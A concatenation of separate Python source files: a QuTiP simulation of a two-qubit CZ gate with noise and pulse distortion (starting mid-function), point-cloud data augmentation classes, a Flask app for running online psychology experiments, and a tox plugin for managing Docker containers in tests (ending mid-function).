H=H_0+eps_vec_new[i]*H_c
c_ops_temp=[]
for c in range(len(c_ops_new)):
if isinstance(c_ops_new[c],list):
c_ops_temp.append(c_ops_new[c][0]*c_ops_new[c][1][i])
else:
c_ops_temp.append(c_ops_new[c])
liouville_exp_t=(qtp.liouvillian(H,c_ops_temp)*sim_step_new).expm()
exp_L_total_new=liouville_exp_t*exp_L_total_new
#exp_L_oneway=(qtp.liouvillian(H_0,c_ops)*240e-3).expm()
t1 = time.time()
print('\n alternative propagator_new',t1-t0)
'''
# We change the basis of H to the basis of eigenvectors of H_0
# The columns of S are the eigenvectors of H_0, appropriately ordered
S = qtp.Qobj(matrix_change_of_variables(H_0),dims=[[3, 3], [3, 3]])
t0 = time.time()
exp_L_total=1
for i in range(len(tlist)):
H=hamiltonian_timedependent(H_0,eps_vec[i],w_bus)
H=S*H*S.dag()
if c_ops != []:
c_ops_temp=[]
for c in range(len(c_ops)):
if isinstance(c_ops[c],list):
c_ops_temp.append(c_ops[c][0]*c_ops[c][1][i])
else:
c_ops_temp.append(c_ops[c])
liouville_exp_t=(qtp.liouvillian(H,c_ops_temp)*sim_step).expm()
else:
liouville_exp_t=(-1j*H*sim_step).expm()
exp_L_total=liouville_exp_t*exp_L_total
#exp_L_oneway=(qtp.liouvillian(H_0,c_ops)*240e-3).expm()
t1 = time.time()
print('\n alternative propagator',t1-t0)
''' # qutip propagator not used anymore because it takes too much time
t0 = time.time()
if c_ops==[]:
nstepsmax=1000
else:
nstepsmax=100000
H_t = [H_0, [H_c, eps_vec]]
U_t = qtp.propagator(H_t, tlist, c_ops, parallel=True, options=qtp.Options(nsteps=nstepsmax)) # returns unitary 'oper' if c_ops=[], otherwise 'super'
t1 = time.time()
print('/n propagator',t1-t0)
if verbose:
print('simulation took {:.2f}s'.format(t1-t0))
'''
U_final = exp_L_total
phases = phases_from_superoperator(U_final)
phi_cond = phases[-1]
L1 = leakage_from_superoperator(U_final)
L2 = seepage_from_superoperator(U_final)
avgatefid = pro_avfid_superoperator_phasecorrected(U_final,phases)
avgatefid_compsubspace = pro_avfid_superoperator_compsubspace_phasecorrected(U_final,L1,phases) # leakage has to be taken into account, see Woods & Gambetta
print('avgatefid_compsubspace',avgatefid_compsubspace)
'''
U_final = exp_L_total_new
phases2 = phases_from_superoperator(U_final)
phi_cond2 = phases2[-1]
L12 = leakage_from_superoperator(U_final)
L22 = seepage_from_superoperator(U_final)
avgatefid2 = pro_avfid_superoperator_phasecorrected(U_final,phases2)
avgatefid_compsubspace2 = pro_avfid_superoperator_compsubspace_phasecorrected(U_final,L12,phases2)
print(phi_cond-phi_cond2,phi_cond)
print(L1-L12,L1)
print(L2-L22,L2)
print(avgatefid-avgatefid2,avgatefid)
print(avgatefid_compsubspace-avgatefid_compsubspace2,avgatefid_compsubspace)
'''
return {'phi_cond': phi_cond, 'L1': L1, 'L2': L2, 'avgatefid_pc': avgatefid, 'avgatefid_compsubspace_pc': avgatefid_compsubspace}
def spectrum(H_0,eps_vec):
eigenvalues=[[],[],[],[],[],[],[],[],[]]
for Omega in eps_vec:
H=H_0+Omega*H_c
eigs=H.eigenenergies()
for i in range(len(eigs)):
eigenvalues[i].append(eigs[i])
return eigenvalues
def fix_theta_f(lambda_3,theta_i):
lambda_1target=1
return (theta_i+2*(lambda_1target+lambda_3))*360/(2*np.pi)
class CZ_trajectory_superoperator(det.Soft_Detector):
def __init__(self, H_0, fluxlutman, noise_parameters_CZ, fitted_stepresponse_ty):
"""
Detector for simulating a CZ trajectory.
Args:
fluxlutman (instr): an instrument that contains the parameters
required to generate the waveform for the trajectory.
noise_parameters_CZ: instrument that contains the noise parameters
fitted_stepresponse_ty: list of two elements, corresponding to the time t
and the step response in volts along the y axis
"""
super().__init__()
self.value_names = ['Cost func', 'Cond phase', 'L1', 'L2', 'avgatefid_pc', 'avgatefid_compsubspace_pc']
self.value_units = ['a.u.', 'deg', '%', '%', '%', '%']
self.fluxlutman = fluxlutman
self.H_0 = H_0
self.noise_parameters_CZ = noise_parameters_CZ
self.fitted_stepresponse_ty=fitted_stepresponse_ty # list of 2 elements: stepresponse (=y)
# as a function of time (=t)
def acquire_data_point(self, **kw):
'''# BENCHMARK FOR HOW THE COUPLING IMPACTS THE HAMILTONIAN PARAMETERS
eigs,eigvectors = self.H_0.eigenstates()
eigs=eigs/(2*np.pi)
print('omegaA =',eigs[1])
print('omegaB =',eigs[2])
print(eigs[4]-eigs[1]-eigs[2])
print('etaA =',eigs[3]-2*eigs[1])
print('etaB =',eigs[5]-2*eigs[2])
print(eigvectors[4],'\n fidelity with 1 /otimes 1=',np.abs(eigvectors[4].dag().overlap(qtp.basis(9,4)))**2)
print(eigvectors[5],'\n fidelity with 0 /otimes 2=',np.abs(eigvectors[5].dag().overlap(qtp.basis(9,2)))**2)
'''
sim_step=1/self.fluxlutman.sampling_rate()
subdivisions_of_simstep=4
sim_step_new=sim_step/subdivisions_of_simstep # waveform is generated according to sampling rate of AWG,
# but we can use a different step for simulating the time evolution
tlist = (np.arange(0, self.fluxlutman.cz_length(),
sim_step))
tlist_new = (np.arange(0, self.fluxlutman.cz_length(),
sim_step_new))
#theta_i = np.arctan(2*self.fluxlutman.cz_J2() / (self.fluxlutman.cz_freq_01_max() - self.fluxlutman.cz_freq_interaction()))
#theta_f=fix_theta_f(self.fluxlutman.cz_lambda_3(),theta_i)
#theta_i=theta_i*360/(2*np.pi)
#self.fluxlutman.cz_theta_f(theta_f)
if not self.fluxlutman.czd_double_sided():
f_pulse = wf.martinis_flux_pulse(
length=self.fluxlutman.cz_length(),
lambda_2=self.fluxlutman.cz_lambda_2(),
lambda_3=self.fluxlutman.cz_lambda_3(),
theta_f=self.fluxlutman.cz_theta_f(),
f_01_max=self.fluxlutman.cz_freq_01_max(),
J2=self.fluxlutman.cz_J2(),
f_interaction=self.fluxlutman.cz_freq_interaction(),
sampling_rate=self.fluxlutman.sampling_rate(),
return_unit='f01') # return in terms of omega
amp = self.fluxlutman.detuning_to_amp((self.fluxlutman.cz_freq_01_max() - f_pulse)/(2*np.pi))
# transform detuning frequency to (positive) amplitude
else:
f_pulse,amp = self.get_f_pulse_double_sided()
# For better accuracy in simulations, redefine f_pulse and amp in trems of sim_step_new
tlist_temp=np.concatenate((tlist,np.array([self.fluxlutman.cz_length()])))
f_pulse_temp=np.concatenate((f_pulse,np.array([f_pulse[-1]])))
amp_temp=np.concatenate((amp,np.array([amp[-1]])))
f_pulse_interp=interp1d(tlist_temp,f_pulse_temp)
amp_interp=interp1d(tlist_temp,amp_temp)
f_pulse=f_pulse_interp(tlist_new)
amp=amp_interp(tlist_new)
# plot(x_plot_vec=[tlist_new*1e9],
# y_plot_vec=[f_pulse/(2*np.pi)/1e9],
# title='Freq. of fluxing qubit during pulse',
# xlabel='Time (ns)',ylabel='Freq. (GHz)',legend_labels=['omega_B(t)'])
amp=amp*self.noise_parameters_CZ.voltage_scaling_factor()
# extract base frequency from the Hamiltonian
w_q0 = np.real(self.H_0[1,1])
#w_q1=np.real(self.H_0[3,3])
#alpha_q0=np.real(self.H_0[2,2])-2*w_q0
#eps_vec = f_pulse - w_q0
#detuning = -eps_vec/(2*np.pi) # we express detuning in terms of frequency
'''#BENCHMARK TO CHECK HOW THE COUPLING VARIES AS A FUNCTION OF DETUNING
J_new=list()
for eps in eps_vec:
H=hamiltonian_timedependent(self.H_0,eps)
J_new.append(np.real(H[1,3]))
plot(x_plot_vec=[tlist_new*1e9],
y_plot_vec=[np.array(J_new)/(2*np.pi)/1e6],
title='Coupling during pulse',
xlabel='Time (ns)',ylabel='J (MHz)',legend_labels=['J(t)'])'''
''' USELESS ####### functions that were used to convert from detuning to voltage but now we use
functions from fluxlutman which are the same as those used in the experiment
def invert_parabola(polynomial_coefficients,y): # useless
a=polynomial_coefficients[0]
b=polynomial_coefficients[1]
c=polynomial_coefficients[2]
return (-b+np.sqrt(b**2-4*a*(c-y)))/(2*a)
voltage_frompoly = invert_parabola(self.fluxlutman.polycoeffs_freq_conv(),detuning)
voltage_frompoly_interp = interp1d(tlist,voltage_frompoly)
voltage_frompoly_convol = voltage_frompoly_interp(tlist_convol1)
convolved_voltage=scipy.signal.convolve(voltage_frompoly_convol,impulse_response_convol)/sum(impulse_response_convol)
convolved_detuning=give_parabola(self.fluxlutman.polycoeffs_freq_conv(),convolved_voltage)
eps_vec_convolved=-convolved_detuning*(2*np.pi)
eps_vec_convolved=eps_vec_convolved[0:np.size(tlist_convol1)]
f_pulse_convolved=eps_vec_convolved+w_q0
'''
def give_parabola(polynomial_coefficients,x):
a=polynomial_coefficients[0]
b=polynomial_coefficients[1]
c=polynomial_coefficients[2]
return a*x**2+b*x+c
if self.noise_parameters_CZ.distortions():
impulse_response=np.gradient(self.fitted_stepresponse_ty[1])
# plot(x_plot_vec=[self.fitted_stepresponse_ty[0]],y_plot_vec=[self.fitted_stepresponse_ty[1]],
# title='Step response',
# xlabel='Time (ns)')
# plot(x_plot_vec=[self.fitted_stepresponse_ty[0]],y_plot_vec=[impulse_response],
# title='Impulse response',
# xlabel='Time (ns)')
# use interpolation to be sure that amp and impulse_response have the same delta_t separating two values
amp_interp = interp1d(tlist_new,amp) # amp is now managed already above
impulse_response_interp = interp1d(self.fitted_stepresponse_ty[0],impulse_response)
tlist_convol1 = tlist_new
tlist_convol2 = np.arange(0, self.fitted_stepresponse_ty[0][-1],
sim_step_new)
amp_convol = amp_interp(tlist_convol1)
impulse_response_convol = impulse_response_interp(tlist_convol2)
# plot(x_plot_vec=[tlist_convol1*1e9],y_plot_vec=[amp_convol],
# title='Pulse in voltage, length=240ns',
# xlabel='Time (ns)',ylabel='Amplitude (V)')
# plot(x_plot_vec=[tlist_convol*1e9],y_plot_vec=[impulse_response_convol],
# title='Impulse response',
# xlabel='Time (ns)')
convolved_amp=scipy.signal.convolve(amp_convol,impulse_response_convol)/sum(impulse_response_convol)
# plot(x_plot_vec=[tlist_convol1*1e9,np.arange(np.size(convolved_amp))*sim_step*1e9],
# y_plot_vec=[amp_convol, convolved_amp],
# title='Net-zero, Pulse_length=240ns',
# xlabel='Time (ns)',ylabel='Amplitude (V)',legend_labels=['Ideal','Distorted'])
convolved_detuning_new=give_parabola(self.fluxlutman.polycoeffs_freq_conv(),convolved_amp)
# plot(x_plot_vec=[tlist*1e9,np.arange(np.size(convolved_amp))*sim_step*1e9],
# y_plot_vec=[detuning/1e9, convolved_detuning_new/1e9],
# title='Net-zero, Pulse_length=240ns',
# xlabel='Time (ns)',ylabel='Detuning (GHz)',legend_labels=['Ideal','Distorted'])
eps_vec_convolved_new=-convolved_detuning_new*(2*np.pi)
eps_vec_convolved_new=eps_vec_convolved_new[0:np.size(tlist_convol1)]
f_pulse_convolved_new=eps_vec_convolved_new+w_q0
else:
detuning_new=give_parabola(self.fluxlutman.polycoeffs_freq_conv(),amp)
eps_vec_convolved_new=-detuning_new*(2*np.pi)
f_pulse_convolved_new=eps_vec_convolved_new+w_q0
T1_q0 = self.noise_parameters_CZ.T1_q0()
T1_q1 = self.noise_parameters_CZ.T1_q1()
T2_q0_sweetspot = self.noise_parameters_CZ.T2_q0_sweetspot()
T2_q0_interaction_point = self.noise_parameters_CZ.T2_q0_interaction_point()
T2_q0_amplitude_dependent = self.noise_parameters_CZ.T2_q0_amplitude_dependent()
T2_q1 = self.noise_parameters_CZ.T2_q1()
def Tphi_from_T1andT2(T1,T2):
return 1/(-1/(2*T1)+1/T2)
if T2_q0_sweetspot != 0:
Tphi01_q0_sweetspot=Tphi_from_T1andT2(T1_q0,T2_q0_sweetspot)
else:
Tphi01_q0_sweetspot=0
if T2_q0_interaction_point != 0:
Tphi01_q0_interaction_point=Tphi_from_T1andT2(T1_q0,T2_q0_interaction_point)
else:
Tphi01_q0_interaction_point=0
# Tphi01=Tphi12=2*Tphi02
if T2_q1 != 0:
Tphi01_q1 = Tphi_from_T1andT2(T1_q1,T2_q1)
else:
Tphi01_q1=0
if T2_q0_amplitude_dependent[0] != -1:
def expT2(x,gc,amp,tau):
return gc+gc*amp*np.exp(-x/tau)
T2_q0_vec=expT2(f_pulse_convolved_new/(2*np.pi),T2_q0_amplitude_dependent[0],T2_q0_amplitude_dependent[1],T2_q0_amplitude_dependent[2])
Tphi01_q0_vec = Tphi_from_T1andT2(T1_q0,T2_q0_vec)
c_ops = c_ops_interpolating(T1_q0,T1_q1,Tphi01_q0_vec,Tphi01_q1)
else:
def omega_prime(omega): # derivative of f_pulse
'''
frequency is w = w_0 * cos(phi_e/2) where phi_e is the external flux through the SQUID.
So the derivative wrt phi_e is
w_prime = - w_0/2 sin(phi_e/2) = - w_0/2 * sqrt(1-cos(phi_e/2)**2) = - w_0/2 * sqrt(1-(w/w_0)**2)
Note: no need to know what phi_e is.
'''
return np.abs((w_q0/2)*np.sqrt(1-(omega/w_q0)**2)) # we actually return the absolute value because it's the only one who matters later
if Tphi01_q0_interaction_point != 0: # mode where the pure dephazing is amplitude-dependent
w_min = np.nanmin(f_pulse_convolved_new)
omega_prime_min = omega_prime(w_min)
f_pulse_convolved_new=np.clip(f_pulse_convolved_new,0,w_q0)
f_pulse_convolved_new_prime = omega_prime(f_pulse_convolved_new)
Tphi01_q0_vec = Tphi01_q0_sweetspot - f_pulse_convolved_new_prime/omega_prime_min*(Tphi01_q0_sweetspot-Tphi01_q0_interaction_point)
# we interpolate Tphi from the sweetspot to the interaction point (=worst point in terms of Tphi)
# by weighting depending on the derivative of f_pulse compared to the derivative at the interaction point
c_ops = c_ops_interpolating(T1_q0,T1_q1,Tphi01_q0_vec,Tphi01_q1)
else: # mode where the collapse operators are time-independent, and possibly are 0
c_ops=jump_operators(T1_q0,T1_q1,0,0,0,0,0,
Tphi01_q0_sweetspot,Tphi01_q0_sweetspot,Tphi01_q0_sweetspot/2,Tphi01_q1,Tphi01_q1,Tphi01_q1/2)
qoi = simulate_quantities_of_interest_superoperator(
H_0=self.H_0,
tlist=tlist_new, c_ops=c_ops, w_bus=self.noise_parameters_CZ.w_bus(), eps_vec=eps_vec_convolved_new,
sim_step=sim_step_new, verbose=False)
cost_func_val = -np.log10(1-qoi['avgatefid_compsubspace_pc']) # new cost function: infidelity
#np.abs(qoi['phi_cond']-180) + qoi['L1']*100 * 5
return cost_func_val, qoi['phi_cond'], qoi['L1']*100, qoi['L2']*100, qoi['avgatefid_pc']*100, qoi['avgatefid_compsubspace_pc']*100
def get_f_pulse_double_sided(self):
half_CZ_A = wf.martinis_flux_pulse(
length=self.fluxlutman.cz_length()*self.fluxlutman.czd_length_ratio(),
lambda_2=self.fluxlutman.cz_lambda_2(),
lambda_3=self.fluxlutman.cz_lambda_3(),
theta_f=self.fluxlutman.cz_theta_f(),
f_01_max=self.fluxlutman.cz_freq_01_max(),
J2=self.fluxlutman.cz_J2(),
# E_c=self.fluxlutman.cz_E_c(),
f_interaction=self.fluxlutman.cz_freq_interaction(),
sampling_rate=self.fluxlutman.sampling_rate(),
return_unit='f01')
half_amp_A = self.fluxlutman.detuning_to_amp(
(self.fluxlutman.cz_freq_01_max() - half_CZ_A)/(2*np.pi))
# first half is mapped to positive voltage
# NOTE: negative part of the flux arc is ignored
# Generate the second CZ pulse. If the params are np.nan, default
# to the main parameter
if not np.isnan(self.fluxlutman.czd_theta_f()):
d_theta_f = self.fluxlutman.czd_theta_f()
else:
d_theta_f = self.fluxlutman.cz_theta_f()
if not np.isnan(self.fluxlutman.czd_lambda_2()):
d_lambda_2 = self.fluxlutman.czd_lambda_2()
else:
d_lambda_2 = self.fluxlutman.cz_lambda_2()
if not np.isnan(self.fluxlutman.czd_lambda_3()):
d_lambda_3 = self.fluxlutman.czd_lambda_3()
else:
d_lambda_3 = self.fluxlutman.cz_lambda_3()
half_CZ_B = wf.martinis_flux_pulse(
length=self.fluxlutman.cz_length()*(1-self.fluxlutman.czd_length_ratio()),
lambda_2=d_lambda_2,
lambda_3=d_lambda_3,
theta_f=d_theta_f,
f_01_max=self.fluxlutman.cz_freq_01_max(),
J2=self.fluxlutman.cz_J2(),
f_interaction=self.fluxlutman.cz_freq_interaction(),
sampling_rate=self.fluxlutman.sampling_rate(),
return_unit='f01')
half_amp_B = self.fluxlutman.detuning_to_amp(
(self.fluxlutman.cz_freq_01_max() - half_CZ_B)/(2*np.pi), positive_branch=False)
# second half is mapped to negative voltage
# NOTE: negative part of the flux arc is ignored
# N.B. No amp scaling and offset present
f_pulse = np.concatenate([half_CZ_A, half_CZ_B])
amp = np.concatenate([half_amp_A, half_amp_B])
return f_pulse,amp
|
import numpy as np
def get_augmentations_from_list(str_list, upright_axis=2):
'''
:param str_list: List of string indicating the augmentation type
:param upright_axis: Set to 1 for modelnet (i.e. y-axis is vertical axis), but 2 otherwise (i.e. z-axis)
:return:
'''
if str_list is None:
return []
augmentations = []
if 'Rotate1D' in str_list:
if upright_axis == 1:
augmentations.append(RotateY())
elif upright_axis == 2:
augmentations.append(RotateZ())
if 'Jitter' in str_list:
augmentations.append(Jitter())
if 'Scale' in str_list:
augmentations.append(Scale())
if 'RotateSmall' in str_list:
augmentations.append(RotateSmall())
if 'Shift' in str_list:
augmentations.append(Shift())
return augmentations
class Augmentation(object):
def apply(self, data):
raise NotImplementedError
class Jitter(Augmentation):
'''
Applies a small jitter to the position of each point
'''
def __init__(self, sigma=0.01, clip=0.05):
self.sigma = sigma
self.clip = clip
def apply(self, data):
assert (self.clip > 0)
jittered_data = np.clip(self.sigma * np.random.randn(*data.shape), -1 * self.clip, self.clip)
jittered_data += data
return jittered_data
class Shift(Augmentation):
def __init__(self, shift_range=0.1):
self.shift_range = shift_range
def apply(self, data):
shift = np.random.uniform(-self.shift_range, self.shift_range, 3)
data += shift
return data
class RotateZ(Augmentation):
'''
Rotation perturbation around Z-axis.
'''
def apply(self, data):
rotation_angle = np.random.uniform() * 2 * np.pi
cosval = np.cos(rotation_angle)
sinval = np.sin(rotation_angle)
rotation_matrix = np.array([[cosval, sinval, 0],
[-sinval, cosval, 0],
[0, 0, 1]])
rotated_data = np.dot(data, rotation_matrix)
return rotated_data
class RotateY(Augmentation):
'''
Rotation perturbation around Y-axis.
'''
def apply(self, data):
rotation_angle = np.random.uniform() * 2 * np.pi
cosval = np.cos(rotation_angle)
sinval = np.sin(rotation_angle)
rotation_matrix = np.array([[cosval, 0, sinval],
[0, 1, 0],
[-sinval, 0, cosval]])
rotated_data = np.dot(data, rotation_matrix)
return rotated_data
class RotateSmall(Augmentation):
'''
Applies a small rotation perturbation around all axes
'''
def __init__(self, angle_sigma=0.06, angle_clip=0.18):
self.angle_sigma = angle_sigma
self.angle_clip = angle_clip
def apply(self, data):
angles = np.clip(self.angle_sigma * np.random.randn(3), -self.angle_clip, self.angle_clip)
Rx = np.array([[1, 0, 0],
[0, np.cos(angles[0]), -np.sin(angles[0])],
[0, np.sin(angles[0]), np.cos(angles[0])]])
Ry = np.array([[np.cos(angles[1]), 0, np.sin(angles[1])],
[0, 1, 0],
[-np.sin(angles[1]), 0, np.cos(angles[1])]])
Rz = np.array([[np.cos(angles[2]), -np.sin(angles[2]), 0],
[np.sin(angles[2]), np.cos(angles[2]), 0],
[0, 0, 1]])
R = np.dot(Rz, np.dot(Ry, Rx))
rotated_data = np.dot(data, R)
return rotated_data
class RotateZLarge_(Augmentation):
'''
Applies a small rotation perturbation around all axes
'''
def __init__(self, angle_sigma=0.06, angle_clip=0.18):
self.angle_sigma = angle_sigma
self.angle_clip = angle_clip
def apply(self, data):
angles = np.clip(self.angle_sigma * np.random.randn(3), -self.angle_clip, self.angle_clip)
Rz = np.array([[np.cos(angles[2]), -np.sin(angles[2]), 0],
[np.sin(angles[2]), np.cos(angles[2]), 0],
[0, 0, 1]])
R = Rz#np.dot(Rz, np.dot(Ry, Rx))
rotated_data = np.dot(data, R)
return rotated_data, R.T
class Scale(Augmentation):
def __init__(self, scale_low=0.8, scale_high=1.25):
self.scale_low = scale_low
self.scale_high = scale_high
def apply(self, data, keypoints=None):
scale = np.random.uniform(self.scale_low, self.scale_high)
data *= scale
return data
|
<reponame>mwetzel7r/webrunner<gh_stars>0
# python standard lib
import json, os, uuid
# external resources
from flask import Flask, redirect, url_for, request, render_template, make_response, jsonify,send_from_directory, flash
from flask_login import current_user, login_user, logout_user, login_required, login_manager
from flask_sqlalchemy import SQLAlchemy
# internal resources
from app import app, db, ops, forms
from app.models import Participant, Name
import config
# - - - - - - - - - - - - - -
# Default Pages
# - - - - - - - - - - - - - -
@app.route('/', methods = ['GET', 'POST'])
def main():
if request.user_agent.platform in ['iphone', 'android']:
return render_template('errors/_mobileRedirect_.html')
form = forms.ConsentForm()
if form.validate():
participant, name = ops.new_user(form.name.data)
ops.save_consent_form(name.name)
exp, condition = ops.get_next_experiment_condition(participant)
participant.condition = condition
db.session.commit()
login_user(participant)
first_exp = json.loads(participant.experiments)[int(participant.status)]
return redirect(url_for('load_exp', exp = first_exp))
return render_template('_startpage_.html', form = form)
# Exit Survey & Debriefing Page
@app.route("/_exit_", methods = ['GET', 'POST'])
# @login_required
def exit_page():
form = forms.DebriefForm()
if form.validate():
misc_id = uuid.uuid4()
while str(misc_id)+'.txt' in os.listdir('data/_exitsurveys_/'):
misc_id = uuid.uuid4()
with open(os.path.join('data/_exitsurveys_/', str(misc_id)+'.txt'), 'w') as file:
for field in form:
if field.id != 'csrf_token':
print(field, file = file)
return redirect(url_for('finalmessage_page'))
return render_template('_exitpage_.html', form = form, show_exit_survey = config.show_exit_survey)
# If they choose to exit
@app.route("/_noconsent_exit_")
def noconsent_exit():
return render_template('_noconsent_exit_.html')
# Final Message
@app.route("/_finalmessage_")
# @login_required
def finalmessage_page():
logout_user()
if config.SONA == True:
return render_template('_finalmessage_.html', assign_SONA_credit = True, SONA_link = config.SONA_link)
else:
return render_template('_finalmessage_.html')
# Cheater Message (if automatic credit assignment didn't work)
@app.route("/_crediterror_")
def creditassignerror_page():
return render_template('errors/_creditassignerror_.html')
@app.route("/_misc_err_")
def misc_err_page():
return render_template('errors/_misc_err_.html')
@app.route("/_iei_")
def transition_page():
return render_template('_transitionpage_.html', instructions = 'Hey')
# - - - - - - - - - - - - - -
# Experiment Pages (dynamically add routes based on experiments in the config file)
# - - - - - - - - - - - - - -
# from: http://www.compjour.org/lessons/flask-single-page/multiple-dynamic-routes-in-flask/
@app.route('/<exp>')
# @login_required
def load_exp(exp):
if exp in config.active:
return render_template(os.path.join('experiments/', config.experiments[exp]['template']))
else:
return render_template('errors/404.html')
# - - - - - - - - - - - - - -
# Operations (routes that lead to some server action being done)
# - - - - - - - - - - - - - -
@app.route('/_next_', methods=['POST'])
# @login_required
def next():
message = request.get_json()
if current_user.is_authenticated == False:
return make_response(
json.dumps({
'next_page': '/_misc_err_',
})
)
if current_user.status == 'finished':
return make_response(
json.dumps({
'next_page': '/_finalmessage_',
})
)
else:
## save subject data
current_exp = json.loads(current_user.experiments)[int(current_user.status)]
ops.save_subject_data(
os.path.join('data/experiments', config.experiments[current_exp]['data'], str(current_user.id)),
message,
)
## update databases
current_user.status = int(current_user.status) + 1
name = db.session.query(Name).filter_by(
id = ops.decrypt_name(current_user.temp_name_link)
).first()
name.status = current_user.status
## get next exp to run
if int(current_user.status) >= len(json.loads(current_user.experiments)):
current_user.status = 'finished'
name.status = current_user.status
current_user.condition = '_done_'
next_page = '/_exit_'
else:
exp, condition = ops.get_next_experiment_condition(current_user)
current_user.condition = condition
next_page = '/_iei_?next_exp=' + exp
db.session.commit() # <-- commit changes to db
return make_response(
json.dumps({
'next_page': next_page,
})
)
|
import os
import re
import socket
import sys
import time
from tox import hookimpl
from tox.config import SectionReader
import py
from docker.errors import ImageNotFound
from docker.types import Mount
import docker as docker_module
# nanoseconds in a second; named "SECOND" so that "1.5 * SECOND" makes sense
SECOND = 1000000000
class HealthCheckFailed(Exception):
pass
def escape_env_var(varname):
"""
Convert a string to a form suitable for use as an environment variable.
The result will be all uppercase, and will have all invalid characters
replaced by an underscore.
The result will match the following regex: [a-zA-Z_][a-zA-Z0-9_]*
Example:
"my.private.registry/cat/image" will become
"MY_PRIVATE_REGISTRY_CAT_IMAGE"
"""
varname = list(varname.upper())
if not varname[0].isalpha():
varname[0] = "_"
for i, c in enumerate(varname):
if not c.isalnum() and c != "_":
varname[i] = "_"
return "".join(varname)
def _newaction(venv, message):
try:
# tox 3.7 and later
return venv.new_action(message)
except AttributeError:
return venv.session.newaction(venv, message)
def _get_gateway_ip(container):
gateway = os.getenv("TOX_DOCKER_GATEWAY")
if gateway:
ip = socket.gethostbyname(gateway)
elif sys.platform == "darwin":
# https://docs.docker.com/docker-for-mac/networking/#use-cases-and-workarounds:
# there is no bridge network available in Docker for Mac, and exposed ports are
# made available on localhost (but 0.0.0.0 works just as well)
ip = "0.0.0.0"
else:
ip = container.attrs["NetworkSettings"]["Gateway"] or "0.0.0.0"
return ip
@hookimpl # noqa: C901
def tox_configure(config): # noqa: C901
def getfloat(reader, key):
val = reader.getstring(key)
if val is None:
return None
try:
return float(val)
except ValueError:
msg = f"{val!r} is not a number (for {key} in [{reader.section_name}])"
raise ValueError(msg)
def gettime(reader, key):
return int(getfloat(reader, key) * SECOND)
def getint(reader, key):
raw = getfloat(reader, key)
val = int(raw)
if val != raw:
msg = f"{val!r} is not an int (for {key} in [{reader.section_name}])"
raise ValueError(msg)
return val
def getenvdict(reader, key):
environment = {}
for value in reader.getlist(key):
envvar, _, value = value.partition("=")
environment[envvar] = value
return environment
# discover container configs
inipath = str(config.toxinipath)
iniparser = py.iniconfig.IniConfig(inipath)
container_configs = {}
for section in iniparser.sections:
if not section.startswith("docker:"):
continue
_, _, container_name = section.partition(":")
if not re.match(r"^[a-zA-Z][-_.a-zA-Z0-9]+$", container_name):
raise ValueError(f"{container_name!r} is not a valid container name")
# populated in the next loop
container_configs[container_name] = {}
# validate command line options
for container_name in config.option.docker_dont_stop:
if container_name not in container_configs:
raise ValueError(
f"Container {container_name!r} not found (from --docker-dont-stop)"
)
# validate tox.ini
for section in iniparser.sections:
if not section.startswith("docker:"):
continue
reader = SectionReader(section, iniparser)
reader.addsubstitutions(
distdir=config.distdir,
homedir=config.homedir,
toxinidir=config.toxinidir,
toxworkdir=config.toxworkdir,
)
_, _, container_name = section.partition(":")
container_configs[container_name].update(
{
"image": reader.getstring("image"),
"stop": container_name not in config.option.docker_dont_stop,
}
)
if reader.getstring("environment"):
env = getenvdict(reader, "environment")
container_configs[container_name]["environment"] = env
if reader.getstring("healthcheck_cmd"):
container_configs[container_name]["healthcheck_cmd"] = reader.getstring(
"healthcheck_cmd"
)
if reader.getstring("healthcheck_interval"):
container_configs[container_name]["healthcheck_interval"] = gettime(
reader, "healthcheck_interval"
)
if reader.getstring("healthcheck_timeout"):
container_configs[container_name]["healthcheck_timeout"] = gettime(
reader, "healthcheck_timeout"
)
if reader.getstring("healthcheck_start_period"):
container_configs[container_name]["healthcheck_start_period"] = gettime(
reader, "healthcheck_start_period"
)
if reader.getstring("healthcheck_retries"):
container_configs[container_name]["healthcheck_retries"] = getint(
reader, "healthcheck_retries"
)
if reader.getstring("ports"):
container_configs[container_name]["ports"] = reader.getlist("ports")
if reader.getstring("links"):
container_configs[container_name]["links"] = dict(
_validate_link_line(link_line, container_configs.keys())
for link_line in reader.getlist("links")
if link_line.strip()
)
if reader.getstring("volumes"):
container_configs[container_name]["mounts"] = [
_validate_volume_line(volume_line)
for volume_line in reader.getlist("volumes")
if volume_line.strip()
]
config._docker_container_configs = container_configs
def _validate_port(port_line):
host_port, _, container_port_proto = port_line.partition(":")
host_port = int(host_port)
container_port, _, protocol = container_port_proto.partition("/")
container_port = int(container_port)
if protocol.lower() not in ("tcp", "udp"):
raise ValueError("protocol is not tcp or udp")
return (host_port, container_port_proto)
def _validate_link_line(link_line, container_names):
other_container_name, sep, alias = link_line.partition(":")
if sep and not alias:
raise ValueError(f"Link '{other_container_name}:' missing alias")
if other_container_name not in container_names:
raise ValueError(f"Container {other_container_name!r} not defined")
return other_container_name, alias or other_container_name
def _validate_volume_line(volume_line):
parts = volume_line.split(":")
if len(parts) != 4:
raise ValueError(f"Volume {volume_line!r} is malformed")
if parts[0] != "bind":
raise ValueError(f"Volume {volume_line!r} type must be 'bind:'")
if parts[1] not in ("ro", "rw"):
raise ValueError(f"Volume {volume_line!r} options must be 'ro' or 'rw'")
volume_type, mode, outside, inside = parts
if not os.path.exists(outside):
raise ValueError(f"Volume source {outside!r} does not exist")
if not os.path.isabs(outside):
raise ValueError(f"Volume source {outside!r} must be an absolute path")
if not os.path.isabs(inside):
raise ValueError(f"Mount point {inside!r} must be an absolute path")
return Mount(
source=outside, target=inside, type=volume_type, read_only=bool(mode == "ro"),
)
@hookimpl # noqa: C901
def tox_runtest_pre(venv): # noqa: C901
envconfig = venv.envconfig
if not envconfig.docker:
return
config = envconfig.config
container_configs = config._docker_container_configs
docker = docker_module.from_env(version="auto")
action = _newaction(venv, "docker")
seen = set()
for container_name in envconfig.docker:
if container_name not in container_configs:
raise ValueError(f"Missing [docker:{container_name}] in tox.ini")
if container_name in seen:
raise ValueError(f"Container {container_name!r} specified more than once")
seen.add(container_name)
image = container_configs[container_name]["image"]
name, _, tag = image.partition(":")
try:
docker.images.get(image)
except ImageNotFound:
action.setactivity("docker", f"pull {image!r} (from {container_name!r})")
with action:
docker.images.pull(name, tag=tag or None)
envconfig._docker_containers = {}
for container_name in envconfig.docker:
container_config = container_configs[container_name]
hc_cmd = container_config.get("healthcheck_cmd")
hc_interval = container_config.get("healthcheck_interval")
hc_timeout = container_config.get("healthcheck_timeout")
hc_retries = container_config.get("healthcheck_retries")
hc_start_period = container_config.get("healthcheck_start_period")
healthcheck = {}
if hc_cmd:
healthcheck["test"] = ["CMD-SHELL", hc_cmd]
